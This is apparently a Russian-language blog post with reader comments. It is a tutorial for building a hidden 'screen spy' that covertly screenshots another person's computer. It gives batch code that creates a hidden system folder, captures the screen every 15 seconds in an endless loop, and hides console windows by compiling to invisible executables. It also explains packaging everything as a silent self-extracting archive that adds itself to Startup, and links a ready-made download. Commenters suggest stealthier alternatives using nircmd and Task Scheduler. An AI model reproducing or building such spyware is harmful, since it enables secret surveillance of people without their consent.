В данной статье я на примерах покажу как сделать шпион своими руками и как скрыто наблюдать за работой пользователя! Как-то я написал небольшую программку для снятия скринов. И тут мне пришла идея использовать свои знания себе в пользу. А именно сделать «экранный шпион».
Принцип его работы в том, что после открытия он добавляет себя в автозагрузку, создаётся папка с «логом работы», в которую через определённое время будут сниматься скриншоты экрана монитора. В результате чего, мы к примеру сможем узнать что делают на нашем компе во время нашего отсутствия.
Экранный шпион
Итак начнём его создание. Нам нужно 4 файла:
1) skr.exe скачать можно здесь
Это тот файл который делает сам скриншот экрана сразу после запуска этого файла.
2) papka.bat с таким кодом:
1 2 |
md %appdata%\log attrib +h +s %appdata%\log |
здесь мы создаём папку с именем «log» и ставим на неё атрибут «скрытый»
3) skreen.bat сюда напишем:
1 2 |
skr.exe -o skrin.png copy skrin.png %appdata%\log\skrin%random%.png |
Первой строкой мы переименовываем скриншот который получится после открытия файла «skr.exe», а второй строкой мы перемещаем скриншот в папку лога но для того чтобы при копировании батник не удалил старые скриншоты мы пишем skrin%random%.png чем избегаем файлов с одинаковыми именами.
4) time.bat код таков: :metka timeout 15 start skreen.exe goto metka
1 2 3 4 |
:metka timeout 15 start skreen.exe goto metka |
Теперь самое важное! Задаём таймер нашей программе. Первой строкой мы ставим метку чтоб повторять одну и ту же команду бесконечное количество раз. Второй строкой ставим «таймер» (время через которое будут сниматься скриншоты. И наконец четвёртая возвращает нас к метке которую мы постили. У вас может возникнуть вопрос-«а почему в третьей строке написано start skreen.exe , а не skreen.bat ?. Да потому что сейчас мы прогоняем все батники в exe (приложения) через программу Bat To Exe Converter , статьи о которой есть на это сайте.
А всё для того чтобы скрыть чёрное DOS окно которое будет вылазить каждые 15 секунд. Заходим в программу выбираем каждый батник по очереди и каждый раз ставим галочку на Invisible application и чтобы сделать exe каждый раз нажимаем на кнопку compile.
А когда всё сделали добавляем файлы в архив и ставим галочку создать sfx архив.Вкладка дополнительно нажимаем параметры sfx.В путь для распаковки пишем %appdata% , в установке выполнить после распаковки пишем papka.exe и time.exe . Далее режимы- ставим галочку на скрытый .
Вкладка дополнительно – нажимаем добавить ярлык ставим галочку на «в папке автозагрузка», в поле имя файла для которого будет создан ярлык пишем time.exe , описание ярлыка хоть что и в имя ярлыка пишем хоть что.lnk . Во вкладке обновление ставим галочку на перезаписывать файлы без запроса. Вот и всё теперь внизу везде нажимаем ок и готово.
Но так как мы скрыли папку с логом поставив на неё атрибут «скрытый» я рекомендую сделать быструю открывалку папки через батник. Вот код:
1 |
explorer %appdata%\log |
Всё, теперь готово!
А кому лень делать самому вот ссылка на готовый экранный шпион
Пароль на архив: www.spy-soft.net
Скачать бесплатно Экранный шпион (скрытое снятие скриншотов)
1. Велосипед не нужен, ибо есть программа nircmd.exe, умеющая в том числе делать скриншоты командой nircmd.exe savescreenshot file.png
2. timeout 15 — это что такое? Это случайно не какая-нибудь сторонняя программа? В стандартной комплектации XP такой нет.
3. Конвертеры bat в exe не нужны, ибо есть куда более кошерные способы скрытого запуска батников: той же nircmd командой nircmd exec hide file.bat или vbs-стартером.
4. Три штуки отдельных батника? Вы шутите? Почему нельзя было все это вписать в один?
Низачот, короче.
Сейчас качну и гляну что это за запеканка.
запуск без окна терминала
start «путь к программе» B
Мне КАЖЕТСЯ или это инструкция с хабра? Т.к. я давненько видел такое
Нет, вроде не с хабра.
Да, уж. Как-то не красиво сделано.
Лучше через Планировщик заданий Windows — будет работать во всех учетных записях и вариантов запуска море (тот же цикл на каждые 10 минут).
для утилиты от нирсофт данный функционал через командную строку:
nircmd.exe loop 10 60000 savescreenshot c:\temp\scr~$currdate.MM_dd_yyyy$-~$currtime.HH_mm_ss$.png
Соглашусь с предыдущими ораторами.
а как удалить это потом?
Вообще супер, спасибо за nicrome )))
Petrpig, ты понимаешь, что если все будет готовенькое, то ты — просто Script kiddie и ничего не умеешь. Если ты хочешь быть настоящим хакером и взломщиком, то ТЫ ДОЛЖЕН УМЕТЬ ВСЕ ДЕЛАТЬ РУЧКАМИ!!!